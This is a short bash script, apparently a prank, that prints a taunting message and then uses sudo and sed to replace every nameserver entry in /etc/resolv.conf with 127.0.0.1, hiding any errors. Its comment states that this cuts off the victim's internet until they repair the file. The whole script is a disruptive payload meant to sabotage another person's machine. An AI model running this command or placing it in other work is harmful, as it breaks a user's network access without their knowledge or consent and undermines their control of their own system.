#!/bin/bash

echo "I've replaced your nameservers with 127.0.0.1. Resolve that."
# This effectively kills their internet until they fix resolv.conf
sudo sed -i 's/nameserver .*/nameserver 127.0.0.1/' /etc/resolv.conf 2>/dev/null
